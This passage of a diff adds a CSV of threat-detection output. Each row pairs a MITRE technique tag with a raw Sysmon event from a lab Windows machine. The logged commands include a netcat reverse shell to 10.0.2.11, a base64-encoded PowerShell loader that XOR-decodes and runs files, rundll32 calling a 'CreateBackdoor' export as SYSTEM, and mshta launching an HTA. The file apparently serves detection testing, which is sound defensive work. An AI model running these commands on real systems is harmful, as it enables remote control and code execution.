+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Line Number: 0&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.563997Z"">
+    </TimeCreated>
+    <EventRecordID>5964</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.513</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010CFCAFF00</Data>
+    <Data Name=""ProcessId"">3892</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Line Number: 0&quot; /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-11T23:21:56.661289Z"">
+    </TimeCreated>
+    <EventRecordID>141993</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2896"" ThreadID=""3548"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-11 23:21:56.654</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DE14-5EB9-0000-001079154300</Data>
+    <Data Name=""ProcessId"">224</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\tools\PrivEsc\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-5461-5EBA-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DE14-5EB9-0000-00107C0F4300</Data>
+    <Data Name=""ParentProcessId"">4468</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Tools\Misc\nc64.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
+    </TimeCreated>
+    <EventRecordID>243520</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
+    <Data Name=""ProcessId"">7124</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
+    </TimeCreated>
+    <EventRecordID>243520</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
+    <Data Name=""ProcessId"">7124</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
+    </TimeCreated>
+    <EventRecordID>556720</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
+    <Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
+    <Data Name=""ProcessId"">9932</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">MSHTA.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
+    <Data Name=""ParentProcessId"">600</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
+    </TimeCreated>
+    <EventRecordID>243520</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
+    <Data Name=""ProcessId"">7124</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
+    </TimeCreated>
+    <EventRecordID>556720</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
+    <Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
+    <Data Name=""ProcessId"">9932</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">MSHTA.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
+    <Data Name=""ParentProcessId"">600</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting  Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
+    </TimeCreated>
+    <EventRecordID>556720</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
+    <Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
+    <Data Name=""ProcessId"">9932</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">MSHTA.EXE</Data>
